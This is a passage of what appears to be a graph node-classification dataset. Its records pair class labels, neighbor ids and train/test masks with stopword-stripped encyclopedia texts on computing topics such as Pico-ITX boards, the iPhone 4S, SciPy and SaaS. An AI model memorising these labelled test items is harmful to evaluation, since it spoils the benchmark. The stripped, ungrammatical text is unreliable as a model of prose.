    "text": "Pico-ITX:pico-itx pico-itx pc motherboard form factor announced via technologies january 2007 demonstrated later year cebit formfactor transferred sff-sig 2008 pico-itx form factor specifications call board half area nano-itx processor via c7 via eden v4 via nano uses via nanobga2 technology speeds 1.5 ghz 128kb l1 l2 caches uses ddr2 400/533 so-dimm memory support 1gb video supplied via agp via unichrome pro ii gpu built-in mpeg-2 4 wmv9 decoding acceleration bios 4 8 mbit award bios first motherboard produced form factor called epia px10000g 10 layers deep operating temperature range 0°c 50°c operating humidity level relative non-condensing 0 95 uses 1 ghz via c7-m processor via vx700 chip set rohs compliant onboard vga video via vt6106s 10/100 8p8c ethernet udma 33/66/100/133 44-pin ata 1x sata 1x i/o dvi lvds video-out usb 2.0 com ps/2 mouse keyboard hd 5.1 channel audio supplied via vt1708a chip supported usage i/o pin headers add-on modules/daughter cards demonstrated running microsoft windows xp windows vista modern versions major linux distributions including fedora core 6 ubuntu 7.10 also run available single board well part barebones package artigo small form factor complete computer model similar px10000g uses 500 mhz via eden ulv cpu two versions model px5000g fan-assisted heatsink px5000eg fanless heatsink note either via px-o add-on module 4 usb 2.0 i/o supplied retail packages via px-o daughtercard supplies access via vt1625m daughtercard supplies access serener pxfpio also labeled via px-dio 109mm × 22mm size connects via 120mm ribbon cable daughter card addon may require modification heatsink due size daughter card supplies access via px-tc daughter card compatible px10000g designed enhance multimedia capture output supplies access second motherboard series form factor p700 series improves upon px10000g series offering gigabit ethernet using via vt6122 chipset 10/100 ethernet adapter via vt6107 manufacturing option integrating power adapter allowing direct +12v dc-in enabling directly power sata making ethernet vga ports optional via p700-a daughter card expanded functionality offered via following pin i/o epia-p700-10l 1 ghz via c7 cpu epia-p700-05le 500 mhz via eden ulv cpu passive heatsink p700 comes retail p700-a p700-b daughter cards p700-a supplies p700-b supplies even though form factor introduced via technologies also boards available based intel processors cpu chipset directly pico-itx board boards like toradex daisy allow addition nano com express modules pico-itx boards also available arm architecture field dh electronics uses standardized dhcom computer modules several arm based modules pico-itxe specification adds onto pico-itx form factor taking epia-p700 upgrading chipset vx800 doubling maximum ram 2 gb allowing 667/533 so-dimm ram upgrading gpu via chrome9 hc3 adding support sumit another notable addition expansion 10 12 layers thickness",
    "neighbors": [
      10337,
      2500,
      7113,
      1515,
      3883,
      9964,
      7151,
      3037,
      2161,
      10095,
      2803,
      10715,
      823,
      8730,
      9307,
      2525,
      799
    ],
    "mask": "None"
  },
  {
    "node_id": 456,
    "label": 2,
    "text": "IPhone_4S:iphone 4s iphone 4s retroactively stylized lowercase iphone 4s september 2013 smartphone designed marketed apple inc fifth generation iphone succeeding iphone 4 preceding iphone 5 announced october 4 2011 apple cupertino campus media coverage accompanied news death former apple ceo co-founder steve jobs following day orders could placed october 7 2011 mainstream availability retail stores began october 14 2011 united states australia canada united kingdom france germany japan sales peaked predecessor million sales first twenty-four hours order availability four million sales first four days retail availability worldwide rollout including 22 additional countries october 28 came next several months iphone named 4s stood siri iphone 4s-exclusive intelligent personal assistant later included future generations mobile apple products retaining external design iphone 4 4s hosted major internal upgrades including upgrade apple a5 chipset 8-megapixel camera 1080p video recording debuted ios 5 fifth major version ios apple mobile operating system introduced features including icloud imessage notification center reminders twitter integration reception generally favorable reviewers noted siri new camera processing speeds significant advantages prior model succeeded iphone 5 apple flagship phone september 12 2012 iphone 4s remained sale albeit sold reduced storage 16/32/64 gb 8 gb 4s officially discontinued september 9 2014 following announcement iphone 6 although production continue developing markets february 17 2016 course lifetime iphone 4s best-selling iphone ever produced first iphone support five major versions ios ios 5 ios 6 ios 7 ios 8 ios 9 ipad 2 supported ios 4 ios 9 4s also last iphone original 30 pin connector succeeding iphone 5 replaced digital lightning connector early may 2011 leaks fairly accurate description iphone 4s including name apple a5 chip hsdpa new camera sprint carrying unveiled apple let talk iphone event october 4 2011 apple campus cupertino california keynote first tim cook gave since verizon keynote earlier year also cook first launch without apple co-founder steve jobs whose health deteriorating died day announcement tim carmody wired praised cook focusing company achievements calling global business thinker taskmaster let talk iphone event held apple october 4 2011 mike capps demonstrated epic games infinity blade ii sequel infinity blade capps boasted game uses epic games unreal engine 3 features graphic techniques used xbox 360 game gears war 3 speculation apple next generation phone including various specifications predicted name iphone 5 widespread time preceding debut announced considered media disappointment due expected release iphone 5 external differences iphone 4 cdma model exception sim card slot changes internal slight external differences iphone 4 gsm model exist said differences existed cdma gsm models iphone 4 september 10 2013 iphone 4s name re-stylised iphone 4s using lower case reflect names newly announced iphone 5s iphone 5c unusual apple upper case used since introduction iphone 3gs 2009 september 9 2014 iphone 4s officially discontinued following reveal iphone 6 iphone 6 plus however 4s production continue developing markets february 17 2016 june 13 2016 following release ios 10 apple dropped support iphone 4s making ios 9 last major ios version available device runs ios apple mobile operating system user interface ios based concept direct manipulation using multi-touch gestures interface control elements consist sliders switches buttons response user input immediate provides fluid interface interaction os includes gestures swipe tap pinch reverse pinch specific definitions within context ios operating system multi-touch interface internal accelerometers used applications respond shaking device one common result undo command rotating three dimensions one common result switching portrait landscape mode iphone 4s first shipped ios 5 released october 12 2011 2 days release device 4s uses ios 5.1.1 released may 7 2012 september 2015 device updated ios 9 act hotspot sharing internet connection wifi bluetooth usb also accesses app store digital application distribution platform ios developed maintained apple service allows users browse download applications itunes store developed xcode ios sdk published apple iphone 4s play music movies television shows ebooks audiobooks podcasts sort media library songs artists albums videos playlists genres composers podcasts audiobooks compilations options always presented alphabetically except playlists retain order itunes iphone 4s uses large font allows users plenty room touch selection users rotate device horizontally landscape mode access cover flow like itunes feature shows different album covers scroll-through photo library scrolling achieved swiping finger across screen alternatively headset controls used pause play skip repeat tracks 4s volume changed included apple earphones voice control feature used identify track play songs playlist specific artist create genius playlist introduced new automated voice control system called siri allows user give iphone commands execute respond example iphone commands weather going like generate response weather cloudy rainy drop 54 degrees today commands vary greatly control almost every application phone commands given specific used natural language siri accessed holding home button short amount time compared using regular function impact siri shown apple video messages much easier people use device functions driving exercising hands full also means people trouble reading seeing typing access phone easily texting aided voice assistant allows speech-to-text addition regular texting messaging supported imessage specialized instant messaging program service allows unlimited texting apple ios 5 products supports inclusion media text messages integration device voice controlled software assistant read receipts sent messages input computer comes keyboard displayed multi-touch screen voice-to text speaking microphone entered text supported predictive suggestion software well spell-checker includes many regional dialects like swiss spoken french announcement plans place support many languages different features different language requirements keyboards compared word predictor spell-checker needs large dictionary words language support related ios 5 operating system device launched although always siri digital assistant supported french english german launch since uses software based keyboard supported multi-touch display support many different keyboard layouts without change physically display different languages scripts time september 19 2012 ios 6 released iphone 4s among compatible ios device air ota upgrade package according apple update contains 200 new features tweaks includes new maps app dubbed apple maps facebook integration passbook application allows users store coupons boarding passes tickets digitally september 18 2013 apple released ios 7 iphone 4s among compatible ios devices also receive update without lagging issues compared iphone 4 although device improved performance ios 7 newer features released newer models airdrop carplay supported iphone 4s also run ios 8 released september 17 2014 given device supported 3 years newer features software apple pay supported also unable work apple watch due relatively aged hardware fact users often reported performance 4s slow similar ios 7 ran iphone 4 suggesting upgrade due battery draining issues hanging calls meanwhile apple released ios 8.1.1 brought slight improvements phone ipad 2 still run fast newer models june 8 2015 apple announced wwdc iphone 4s would support ios 9 makes first iphone support 5 major versions ios second ios device support 5 major versions ios 9 support ipad 2 well bringing total six major versions ios supported although iphone 4s begun limitations ios 8 ios 9 said bring performance enhancements may help aging device run smoothly december 22 2015 apple faced class action lawsuit crippling iphone 4s ios 9 update slow buggy software pay hundreds dollars new iphone june 13 2016 apple announced iphone 4s support ios 10 due hardware limitations january 2018 apple suddenly started firmware signing ios 6.1.3 ipad 2 iphone 4s allowing users downgrade devices ios 6.1.3. ios 8 available over-the-air update ios 6 allowing users update devices ios 8.4.1 july 2019 still supported july 22 2019 apple released ios 9.3.6 iphone 4s makes longest supported iphone time number version least uses apple a5 system-on-chip soc incorporates imagination technologies powervr sgx543 graphics processing unit gpu gpu features pixel vertex geometry shader hardware supporting opengl es 2.0 sgx543 improved version gpu used predecessor iphone 4 uses dual-core model integrated apple a5 soc way ipad 2 apple claims seven times faster graphics iphone 4 corroborated epic games president mike capps 512 mb ddr2 ram maximum available storage size increased 64 gb 32 gb 16 gb model options retained september 2013 apple released iphone 4s free two year contract 8 gb storage screen prior generation iphones 640×960 resolution apple retina design improvement interactive multimedia applications compared predecessor improved cellular gsm antenna design iphone 4 new antenna divided two pieces within stainless steel band wraps around sides phone therefore gripped way attenuate one piece cellular antenna radio switch piece n't gripped support maximum theoretical download speed 14.4 mbps hsdpa+ result upgraded radio chip inside phone addition world phone gsm cdma customers roam internationally gsm networks also supports bluetooth 4.0 camera also known isight camera take 8-megapixel photos 3,264 2,448 pixels record 1080p videos 30 frames per second upgraded quality 30 better clarity 26 better white balance color accuracy due additional lens ir filter wider f/2.4 aperture image signal processor built-in a5 built-in gyroscope allows image stabilization camera recording video although still room improvement since state-of-the-art image stabilization algorithms need use gyroscope use image processing features camera macro close pictures faster capture including able take first picture 1.1 seconds next half second later features 960 640 pixel multitouch retina display two volume buttons ring/silent switch left side top left 3.5 mm headphone jack microphone used noise cancellation calls speakerphone/facetime video calling mode lock/power button situated top right edge device right side device micro-sim card slot bottom device features speaker output right microphone input left apple proprietary 30-pin dock connector center supports video via airplay various apple a/v cables supported video formats include h.264 1080p 30 frames per second maximum mpeg-4 video motion jpeg m-jpeg addition user inputs device also several sensors give phone information orientation external conditions include three-axis gyroscope accelerometer proximity sensor ambient light sensor stated 200 hours standby time 8 hours talk time 3g 14 hours talk time 2g 6 hours 3g browsing 9 hours wi-fi browsing additionally sustain 10 hours video playback 40 hours audio playback stainless steel dual cellular antenna design identical iphone 4 cdma apple redesigned antenna cdma original iphone 4 users reported cellular signal attenuation problems result holding phone certain positions improved cellular radio phone switch two antennas depending sending/receiving best signal two antennas incorporated distinctive stainless steel band wraps around sides bands iphone 4s divided two antennas cellular global positioning system gps bluetooth wi-fi reliant internal antenna iphone 4 4s designed jonathan ive 4 generation iphones differ earlier apple designs bulges back panel well band front back gone replaced flattened surfaces redesign reflects utilitarianism uniformity existing apple products ipad imac overall dimensions lower 3gs high wide deep compared iphone 3gs high wide deep making iphone 4 4s 21.5 thinner 3gs internal components situated two panels aluminosilicate glass described apple chemically strengthened 20 times stiffer 30 times harder plastic theoretically allowing scratch-resistant durable prior models reception generally favorable reviewers noted siri new camera processing speeds significant advantages prior model tim stevens engadget said everything better iphone 4 simply n't anything substantially different joshua topolsky verge stated car would mercedes siri probably one novel applications apple ever produced reviewers thought siri important feature brian chen wired said fifth-generation iphone superb camera speedy dual-core processor classy additions siri reason people buy phone retrevo surveyed 1,300 u.s. consumers reported 71 percent smartphone owners disappointed new 47 percent almost half current iphone 4 owners 12 percent hoping bigger display 21 percent wanted refreshed design 29 percent desired 4g echoing technology pundits reuters suggested lack radical departure iphone 4 could open new market opportunities rivals analyst c. k. lu gartner believed apple longer leading edge 4s would sell due brand loyalty fans expecting iphone 5 thinner profile edge-to-edge screen stronger features fans also wanted cheaper stripped-down iphone 4 gaming likened playstation vita features sgx gpu quad-core configuration nintendo 3ds handheld game consoles ability process 80 million polygons per second compared playstation 3 xbox 360 home video game consoles process 275 million 500 million polygons per second respectively computer video games cvg deputy editor andy robinson told techradar 4s certainly laying serious credibility iphone core gaming device pushing games simply eclipse 3ds visually features like cloud saving tv streaming support really exciting gamers senior gaming analyst jon peddie research ted pollak believes biggest improvement gaming voice control features noting one features nintendogs players loved ability talk reason game like could n't done much sophisticated given voice control shown 2012 iphone 4s t3 work gadget year award beating rim blackberry bold 9900 rival samsung galaxy note amongst others since introduction iphone 4s several issues reported users internet forums noted media organizations cnn boy genius report guardian pc world unlike prior iphone models number sales iphone 4 yet climaxed introduction 4s previous iphone models released declining sales figures addition iphone 4 users high marks satisfied phone upon announcement shares samsung electronics htc nokia gained wednesday 4s announced apple stock fell however later day apple shares rebounded ending 1 gain launch orders said demand extraordinary 200,000 orders placed within 12 hours release german phone company deutsche telekom said satisfied consumer interest addition verizon sprint sold-out initial stock october 8 2011 october 9 1–2 week estimate new orders filled october 20 2011 surpassed one million activations october 10 apple announced one million orders received within first 24 hours sale beating 600,000 device record set iphone 4 16-month wait iphone 4 4s may contributed overwhelming sales well october 17 2011 apple announced four million units sold first three days release 25 million ios users upgraded latest version ios ios 5 released upon introduction phone phil schiller apple senior vice president worldwide product marketing stated great start four million sold first weekend—the ever phone double iphone 4 launch first three days used phone market saw unprecedented rates trade-ins weeks leading 4s announcement drop prices offered previous generation iphones recirculated markets various methods third-party buyers may purchase older generation iphones apple also buys back previous generation iphones special program april 24 2012 announced 7.6 million iphone units activated q4 2011 4.3 million q1 2012 total sold 5.5 million smartphones first quarter 2012 78 iphones",
    "neighbors": [
      4609,
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      11289,
      7706,
      1057,
      1576,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      1083,
      8253,
      576,
      7745,
      8783,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      7780,
      8806,
      3691,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      4225,
      10878,
      8842,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      3790,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      8937,
      2282,
      9451,
      1772,
      4844,
      10478,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      9999,
      784,
      10512,
      4888,
      5912,
      5927,
      10023,
      4399,
      3380,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      7496,
      2388,
      3928,
      4957,
      6495,
      9063,
      10602,
      3948,
      11629,
      10608,
      2439,
      6023,
      6537,
      6539,
      7052,
      1428,
      3483,
      10658,
      2979,
      9123,
      11173,
      8109,
      10675,
      2492,
      446,
      7614,
      5058,
      2502,
      1482,
      9163,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      7154,
      11257,
      6654
    ],
    "mask": "None"
  },
  {
    "node_id": 457,
    "label": 3,
    "text": "System.map:system.map linux system.map file symbol table used kernel symbol table look-up symbol names addresses memory symbol name may name variable name function system.map required address symbol name symbol name address needed especially useful debugging kernel panics kernel oopses kernel address-to-name translation codice_1 enabled tools like ksymoops required following part codice_2 file addresses may change one build next new codice_2 generated build kernel character address symbol separated spaces type symbol codice_4 utility program unix systems list symbols object files codice_2 directly related file produced codice_4 whole kernel program like codice_4 lists symbols types small object programs types building linux kernel codice_2 located root source directory however software installation steps expect locate file elsewhere",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      3618,
      6180,
      8242,
      9266,
      4161,
      10817,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      8326,
      7821,
      4238,
      10382,
      2195,
      8852,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      4841,
      7403,
      10482,
      2294,
      8439,
      2809,
      7938,
      4360,
      1291,
      4367,
      1813,
      792,
      10016,
      295,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      7540,
      8573,
      1406,
      8066,
      900,
      5514,
      4493,
      11155,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9646,
      1456,
      1972,
      9660,
      9667,
      5067,
      8147,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 458,
    "label": 8,
    "text": "International_Journal_of_Web_Services_Research:international journal web services research international journal web services research ijwsr quarterly peer-reviewed academic journal covering web services established 2004 published igi global editor-in-chief liang-jie zhang kingdee international software group china open group journal abstracted indexed",
    "neighbors": [
      10020,
      8975
    ],
    "mask": "None"
  },
  {
    "node_id": 459,
    "label": 1,
    "text": "Circumpolar_Health_Bibliographic_Database:circumpolar health bibliographic database circumpolar health bibliographic database chbd free electronic database abstracts citations geographic subject indexing library codes links full text publications peer-reviewed gray literature established 2007 contains sixty five hundred records describe human health circumpolar region chbd circumpolar chronic disease prevention project canadian institutes health research maintained university calgary calgary alberta canada chbd initially constructed records arctic institute north america database mainly northern canadian records expected take several years add non-canadian records chbd circumpolar health observatory proposed may 2008 norway would disseminate data chbd funding database increased 50 period 2008-2009",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 460,
    "label": 2,
    "text": "Information_Bridge_Framework:information bridge framework information bridge framework microsoft office programmability framework microsoft targeting microsoft office 2003 later versions used extract data office documents embedding functionality office applications custom applications",
    "neighbors": [
      7523,
      2632,
      11144,
      10029,
      1904,
      9328,
      5619,
      440,
      2046
    ],
    "mask": "Test"
  },
  {
    "node_id": 461,
    "label": 4,
    "text": "Fiddler_(software):fiddler software fiddler http debugging proxy server application originally written eric lawrence formerly program manager internet explorer development team microsoft fiddler captures http https traffic logs user review logging performed implementing man-in-the-middle interception using self-signed certificates 6 october 2003 eric lawrence released first official version fiddler 12 september 2012 fiddler acquired telerik lawrence joined company work fiddler full-time basis 23 december 2015 lawrence left telerik google chrome security team telerik continued develop fiddler june 2018 lawrence returned microsoft principal program manager",
    "neighbors": [
      7264,
      9440,
      4797,
      1064,
      842,
      3310,
      7983,
      3604,
      3573,
      4725,
      823,
      2169,
      2205,
      9694,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 462,
    "label": 9,
    "text": "SciPy:scipy scipy pronounced /ˈsaɪpaɪ'/ sigh pie free open-source python library used scientific computing technical computing scipy contains modules optimization linear algebra integration interpolation special functions fft signal image processing ode solvers tasks common science engineering scipy builds numpy array object part numpy stack includes tools like matplotlib pandas sympy expanding set scientific computing libraries numpy stack similar users applications matlab gnu octave scilab numpy stack also sometimes referred scipy stack scipy also family conferences users developers tools scipy united states euroscipy europe scipy.in india enthought originated scipy conference united states continues sponsor many international conferences well host scipy website scipy library currently distributed bsd license development sponsored supported open community developers also supported numfocus community foundation supporting reproducible accessible science scipy package key algorithms functions core python scientific computing capabilities available sub-packages include basic data structure used scipy multidimensional array provided numpy module numpy provides functions linear algebra fourier transforms random number generation generality equivalent functions scipy numpy also used efficient multidimensional container data arbitrary datatypes allows numpy seamlessly speedily integrate wide variety databases older versions scipy used numeric array type deprecated favor newer numpy array code 1990s python extended include array type numerical computing called numeric package eventually replaced travis oliphant wrote numpy 2006 blending numeric numarray started 2001 2000 growing number extension modules increasing interest creating complete environment scientific technical computing 2001 travis oliphant eric jones pearu peterson merged code written called resulting package scipy newly created package provided standard collection common numerical operations top numeric array data structure shortly thereafter fernando pérez released ipython enhanced interactive shell widely used technical computing community john hunter released first version matplotlib 2d plotting library technical computing since scipy environment continued grow packages tools technical computing",
    "neighbors": [
      9208,
      7684,
      9893,
      5703,
      8554,
      5612,
      7983,
      8079,
      11221,
      6134,
      3960,
      11385,
      2045,
      7326
    ],
    "mask": "None"
  },
  {
    "node_id": 463,
    "label": 2,
    "text": "Image_Packaging_System:image packaging system image packaging system also known ips pkg 5 cross-platform written python package management system created opensolaris community coordination sun microsystems used solaris 11 several illumos-based distributions openindiana omnios xstreamos growing number layered applications including glassfish across variety os platforms features include fact ips delivers single file separate shelf separate checksum package update needs replace files modified elf binaries computes checksums loaded parts elf binary permits e.g avoid update elf binary changed elf comment section due fact ips delivers single file separate shelf slow operation caused input source medium high latency e.g internet higher round trip time cd/dvd media slow seeks",
    "neighbors": [
      10760,
      8213,
      6680,
      9245,
      5155,
      5670,
      7722,
      5677,
      10817,
      3667,
      6227,
      11363,
      9324,
      1138,
      2168,
      7293,
      9343,
      6797,
      10900,
      10394,
      4775,
      6828,
      5819,
      190,
      4302,
      2259,
      4309,
      5335,
      6361,
      8413,
      741,
      231,
      2281,
      6393,
      11525,
      7435,
      7947,
      9487,
      788,
      1813,
      5397,
      8476,
      6446,
      1842,
      823,
      2872,
      3918,
      4951,
      9564,
      2401,
      1379,
      9063,
      8554,
      10096,
      5492,
      8068,
      3462,
      8582,
      2955,
      2967,
      6049,
      11184,
      6583,
      10172,
      9151,
      9665,
      8644,
      9671,
      5578,
      5067,
      5070,
      2010,
      7140,
      6119,
      5096,
      5612,
      1522,
      3573
    ],
    "mask": "Test"
  },
  {
    "node_id": 464,
    "label": 2,
    "text": "IPhone_3G:iphone 3g iphone 3g smartphone designed marketed apple inc. second generation iphone successor original iphone introduced june 9 2008 wwdc 2008 moscone center san francisco united states iphone 3g internally similar predecessor included several new hardware features gps 3g data tri-band umts/hsdpa device originally loaded concurrently launched iphone os 2.0 addition features including push email turn-by-turn navigation new operating system introduced app storeapple new distribution platform third-party applications july 11 2008 apple released iphone 3g across twenty-two countries two storage options 8gb 16gb 16gb model produced either black white following release successor iphone 3gs model one year later iphone 3g remained sale became apple budget phone offer price cut half 99 iphone 3g required two-year contract available black 8 gb storage came bundled then-new iphone os 3.0 firmware june 7 2010 iphone 3g finally discontinued replaced apple budget phone 8gb iphone 3gs selling price 99 2-year contract iphone 3g came preloaded latest version iphone os continued receive updates software two years major iterations released annual basis however phone access decreasing proportion new features update hardware became superseded later models launched iphone 3g came preloaded iphone os 2.0 introduced app store microsoft exchange activesync support apple ’ mobileme service push email support along new features bug fixes june 2009 iphone 3g users received iphone os 3.0 software update introduced long-awaited mms feature copy paste landscape support applications bluetooth stereo support improvements june 2010 apple released ios 4.0 software update unlike successor models iphone 3g support prominent features ios 4.0 multitasking ability set home screen wallpaper bluetooth keyboard support however provide access unified mailbox feature homescreen folders better organize apps playlist creation enhancements update widely criticized slow performance iphone 3g though september 2010 ios 4.1 release resolved problem however unlike modern ios devices update provide iphone 3g owners access important features case game center application november 22 2010 iphone 3g received ios 4.2 software update ios 4.2.1 introduced features youtube voting security fixes however iphone 3g unable use many features included update airplay safari text search last ios release support iphone model ios 4.3 later compatible iphone model due hardware limitations performance issues iphone 3g back featured redesigned polycarbonate plastic housing replacing aluminum back first generation buttons changed plastic metal edges phone tapered providing better grip iphone 3g introduced first official color options outer casing 16gb version available black white dimensions iphone 3g marginally larger original iphone high wide deep compared predecessor high wide deep iphone 3g sported capacitive touchscreen 480×320 hvga resolution 163 ppi scratch-resistant glass sits top display like original iphone touchscreen designed bare finger multiple fingers multi-touch sensing device featured sensors predecessor proximity sensor deactivates display calls face near repositioned save battery power prevent inadvertent inputs user ’ face ears ambient light sensor included adjust display brightness different lighting conditions helps save battery power 3-axis accelerometer included sense orientation phone change screen accordingly allowing user easily switch portrait landscape mode iphone 3g internal hardware based original iphone still includes samsung 32-bit risc arm11 620 mhz processor underclocked 412 mhz powervr mbx lite 3d gpu 128 mb package package pop dram rear device iphone 3g features fixed-focus 2.0 megapixel camera predecessor camera optical zoom flash autofocus native video recording although various applications became available allow video recording device iphone 3g operating system supports geotagging photographs addition edge iphone 3g supports assisted gps 3g data tri-band umts/hsdpa enhancements allow faster data downloads turn-by-turn navigation maps compared previous devices like predecessor iphone 3g features proprietary 30-pin dock connector charging device also used synchronize device computer connect various accessories iphone 3g features flush-mounted 3.5 mm headphone jack instead recessed headphone jack included original iphone could therefore used headphones provided apple iphone 3g features internal rechargeable battery rated 1150 mah like predecessor user-replaceable apple stated iphone 3g ’ battery capable providing six hours web browsing via wi-fi five hours via 3g 25 hours audio playback alternatively said provide 300 hours standby time walt mossberg wall street journal described device capable version already excellent device however said hidden costs ios 4 still compatible iphone 3g released june 21 2010 article wall street journal digits column july 28 2010 reported iphone 3g phones updating ios 4 responded slowly diminished battery life became excessively hot",
    "neighbors": [
      4609,
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      5138,
      11289,
      7706,
      1057,
      1576,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      1083,
      8253,
      576,
      8783,
      4180,
      10838,
      1623,
      3672,
      6748,
      3681,
      9826,
      8806,
      3691,
      2673,
      6264,
      7292,
      2686,
      6783,
      7806,
      10878,
      8842,
      659,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      11430,
      171,
      2735,
      3248,
      9391,
      4283,
      3772,
      7869,
      3790,
      2259,
      3286,
      9430,
      3293,
      4318,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      9964,
      1776,
      10481,
      7420,
      1290,
      3338,
      781,
      9999,
      784,
      10512,
      4888,
      5912,
      10023,
      4399,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      838,
      7496,
      2388,
      3928,
      4957,
      6495,
      9063,
      10602,
      3948,
      11629,
      10608,
      2439,
      6023,
      6537,
      6539,
      7052,
      1428,
      3483,
      10658,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      5058,
      2502,
      456,
      1482,
      9163,
      7118,
      6608,
      8662,
      9174,
      10199,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      7154,
      11257,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 465,
    "label": 9,
    "text": "Lightweight_Imaging_Device_Interface_Language:lightweight imaging device interface language lightweight imaging device interface language abbr lidil printer interface definition language used recent hewlett-packard printers language commonly used hp deskjets support pcl printer language name suggests language supports definition raster documents limited overall host-based protocol advertised ldl cmd command set field device id string models support printing ascii text",
    "neighbors": [
      5384,
      8262,
      10465,
      6830
    ],
    "mask": "Test"
  },
  {
    "node_id": 466,
    "label": 3,
    "text": "Load–store_unit:load–store unit computer engineering load–store unit lsu specialized execution unit responsible executing load store instructions generating virtual addresses load store operations loading data memory storing back memory registers load–store unit usually includes queue acts waiting area memory instructions unit operates independently processor units load–store units may also used vector processing cases term load–store vector may used load-store units also capable executing simple fixed-point and/or integer operations",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      1309,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      8684,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 467,
    "label": 7,
    "text": "Software_as_a_service:software service software service saas software licensing delivery model software licensed subscription basis centrally hosted sometimes referred on-demand software formerly referred software plus services microsoft saas typically accessed users using thin client e.g via web browser saas become common delivery model many business applications including office software messaging software payroll processing software dbms software management software cad software development software gamification virtualization accounting collaboration customer relationship management crm management information systems mis enterprise resource planning erp invoicing human resource management hrm talent acquisition learning management systems content management cm geographic information systems gis service desk management saas incorporated strategy nearly leading enterprise software companies according gartner estimate saas sales 2018 expected grow 23 72 billion saas applications also known web-based software on-demand software hosted software term software service saas considered part nomenclature cloud computing along infrastructure service iaas platform service paas desktop service daas managed software service msaas mobile backend service mbaas information technology management service itmaas centralized hosting business applications dates back 1960s starting decade ibm mainframe providers conducted service bureau business often referred time-sharing utility computing services included offering computing power database storage banks large organizations worldwide data centers expansion internet 1990s brought new class centralized computing called application service providers asp asps provided businesses service hosting managing specialized business applications goal reducing costs central administration solution provider specialization particular business application two world pioneers largest asps usi headquartered washington dc area futurelink corporation headquartered irvine california software service essentially extends idea asp model term software service saas however commonly used specific settings acronym first appeared goods services description uspto trademark filed september 23 1985 dbaas database service emerged sub-variety saas type cloud database cloud saas model physical need indirect distribution distributed physically deployed almost instantaneously thereby negating need traditional partners middlemen however market grown saas managed service players forced try redefine role unlike traditional software conventionally sold perpetual license up-front cost optional ongoing support fee saas providers generally price applications using subscription fee commonly monthly fee annual fee consequently initial setup cost saas typically lower equivalent enterprise software saas vendors typically price applications based usage parameters number users using application however saas environment customers data reside saas vendor opportunities also exist charge per transaction event unit value number processors required relatively low cost user provisioning i.e. setting new customer multitenant environment enables saas vendors offer applications using freemium model model free service made available limited functionality scope fees charged enhanced functionality larger scope saas applications completely free users revenue derived alternative sources advertising key driver saas growth saas vendors ability provide price competitive on-premises software consistent traditional rationale outsourcing systems involves applying economies scale application operation i.e. outside service provider may able offer better cheaper reliable applications vast majority saas solutions based multitenant architecture model single version application single configuration hardware network operating system used customers tenants support scalability application installed multiple machines called horizontal scaling cases second version application set offer select group customers access pre-release versions applications e.g. beta version testing purposes contrasted traditional software multiple physical copies software — potentially different version potentially different configuration often customized — installed across various customer sites traditional model version application based unique code although exception rather norm saas solutions use multitenancy use mechanisms—such virtualization—to cost-effectively manage large number customers place multitenancy whether multitenancy necessary component software service topic controversy two main varieties saas although software-as-a-service applications share traits characteristics common among many saas applications saas applications similarly support traditionally known application configuration words like traditional enterprise software single customer alter set configuration options a.k.a parameters affect functionality look-and-feel customer may settings parameter values configuration options application customized degree designed based set predefined configuration options example support customers common need change application look-and-feel application appears customer brand or—if desired—co-branded many saas applications let customers provide self service interface working application provider staff custom logo sometimes set custom colors customer however change page layout unless option designed saas applications often updated frequently traditional software many cases weekly monthly basis enabled several 